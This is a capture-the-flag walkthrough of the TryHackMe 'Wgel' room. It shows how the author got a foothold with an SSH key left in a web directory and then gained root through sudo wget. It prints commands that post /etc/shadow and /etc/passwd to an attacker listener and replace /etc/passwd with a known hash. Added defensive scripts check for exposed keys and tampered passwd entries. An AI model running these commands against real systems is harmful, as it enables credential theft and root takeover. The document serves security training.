Wgel CTF

Room Link: https://tryhackme.com/room/wgelctf

Scanning

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

The main page of the site was just the Apache default page, but in the page source there is a comment from someone named jessie.

Ran gobuster and found a site under /sitemap; nothing really interesting about it when browsing.

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 

Running gobuster against /sitemap/ didn't turn up anything interesting either.

Kali

gobuster dir -u http://$VICTIM/sitemap/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 

Ran dirb with defaults and it found a .ssh folder containing an id_rsa, so I downloaded the key and used it.

Kali

dirb http://$VICTIM/sitemap/

Kali

chmod 600 id_rsa
ssh -v -i id_rsa jessie@$VICTIM
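The foothold above comes from a private key served out of the web root. As an added example (not part of the original writeup), here is a defender-side audit that walks a document root and reports dot-directories and private keys that should never be reachable over HTTP. The docroot path is taken as an argument (the real one for this box is not on the page), and the demo tree it builds under mktemp is constructed for illustration only.

```shell
#!/bin/sh
# Added example, not from the Wgel writeup: audit a web document root for
# files a web server should never serve. Usage: audit_webroot /var/www/html
# Prints one line per finding; returns 1 if anything was found, 0 if clean.
audit_webroot() {
    root="$1"
    # Names that should never sit under a docroot (constructed list, not exhaustive).
    names="$(find "$root" \( -name '.ssh' -o -name 'id_rsa' -o -name 'id_dsa' \
        -o -name 'id_ecdsa' -o -name 'id_ed25519' -o -name '.git' -o -name '.env' \
        -o -name '.htpasswd' -o -name '*.pem' -o -name '*.key' \) -print 2>/dev/null)"
    # Content check: anything that looks like a PEM private key, whatever its name.
    keys="$(grep -rl -- '-----BEGIN .*PRIVATE KEY-----' "$root" 2>/dev/null || true)"
    status=0
    if [ -n "$names" ]; then
        printf '%s\n' "$names" | sed 's/^/EXPOSED-NAME /'
        status=1
    fi
    if [ -n "$keys" ]; then
        printf '%s\n' "$keys" | sed 's/^/PRIVATE-KEY-CONTENT /'
        status=1
    fi
    return "$status"
}

# Constructed demo docroot mirroring the layout found on the box: an index
# page plus sitemap/.ssh/id_rsa. The key body is a placeholder, not a real key.
make_demo_root() {
    d="$(mktemp -d)"
    mkdir -p "$d/sitemap/.ssh"
    echo '<html>demo</html>' > "$d/index.html"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
        'PLACEHOLDER-NOT-A-REAL-KEY' \
        '-----END OPENSSH PRIVATE KEY-----' > "$d/sitemap/.ssh/id_rsa"
    echo "$d"
}

# Stand-alone demo run.
demo="$(make_demo_root)"
if audit_webroot "$demo"; then
    echo "clean: $demo"
else
    echo "findings under $demo (see lines above)"
fi
rm -rf "$demo"
```

Pointing `audit_webroot` at the live docroot from cron turns the check into a recurring control; the content check matters because renaming a key does not stop it being served. On Apache 2.4 a `<DirectoryMatch "/\.">` block with `Require all denied` additionally refuses every dot-directory regardless of what gets copied in.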

Victim

sudo -l

I tried cracking jessie's hash, since I would then be able to run any command with sudo, but I couldn't crack it. Documenting it anyway.

Victim

sudo -u root /usr/bin/wget --post-file=/etc/shadow $KALI:4444
sudo -u root /usr/bin/wget --post-file=/etc/passwd $KALI:4444

Kali

nc -lvnp 4444

Kali

unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Instead I changed the passwd file: I first downloaded it to Kali and edited jessie's line so their password is now '123', then uploaded it back over the original and just became root.

Victim

sudo -u root /usr/bin/wget --post-file=/etc/passwd 10.10.65.21:4444

Kali

nc -lvnp 4444

Line to change

jessie:$1$new$p7ptkEKU1HnaHpRtzNizS1:1000:1000:jessie,,,:/home/jessie:/bin/bash

Kali

python2 -m SimpleHTTPServer 81

Victim

sudo wget http://$KALI:81/passwd -O /etc/passwd
sudo -i
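The overwrite above leaves two artifacts a defender can look for: a password hash sitting directly in the second field of /etc/passwd (the field should be `x`, with the hash living in /etc/shadow) and, in the general case, any extra UID-0 account. As an added example that is not part of the original writeup, the following check parses a passwd-format file and flags both. The sample file it builds is constructed; jessie's line is the one shown above, and `backup2` is a made-up second root account added to exercise the UID-0 rule.

```shell
#!/bin/sh
# Added example, not from the Wgel writeup: integrity check for a passwd-format
# file. Usage: check_passwd /etc/passwd
# Prints one line per finding; returns 1 if anything was flagged, 0 if clean.
check_passwd() {
    file="$1"
    awk -F: '
        # Every entry must have exactly seven colon-separated fields.
        NF != 7 { printf "MALFORMED line %d\n", NR; bad = 1; next }
        # Empty password field means the account may log in without a password.
        $2 == "" { printf "EMPTY-PASSWORD %s\n", $1; bad = 1 }
        # Anything other than the shadow marker (or a lock marker) is a hash
        # stored in passwd itself, which is what the wget overwrite produces.
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" {
            printf "HASH-IN-PASSWD %s\n", $1; bad = 1
        }
        # Only root should have UID 0.
        $3 == 0 && $1 != "root" { printf "EXTRA-UID0 %s\n", $1; bad = 1 }
        END { exit bad + 0 }
    ' "$file"
}

# Constructed sample passwd: root and a service account as shipped, jessie's
# line exactly as modified in the writeup, and a made-up extra UID-0 account.
make_demo_passwd() {
    f="$(mktemp)"
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jessie:$1$new$p7ptkEKU1HnaHpRtzNizS1:1000:1000:jessie,,,:/home/jessie:/bin/bash
backup2:x:0:0::/root:/bin/bash
EOF
    echo "$f"
}

# Stand-alone demo run.
demo="$(make_demo_passwd)"
if check_passwd "$demo"; then
    echo "clean: $demo"
else
    echo "findings in $demo (see lines above)"
fi
rm -f "$demo"
```

Expected findings for the sample are `HASH-IN-PASSWD jessie` and `EXTRA-UID0 backup2`. The same check belongs next to a file-integrity monitor on /etc/passwd and /etc/sudoers; `pwck -r` from shadow-utils performs a related read-only consistency check between passwd and shadow.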
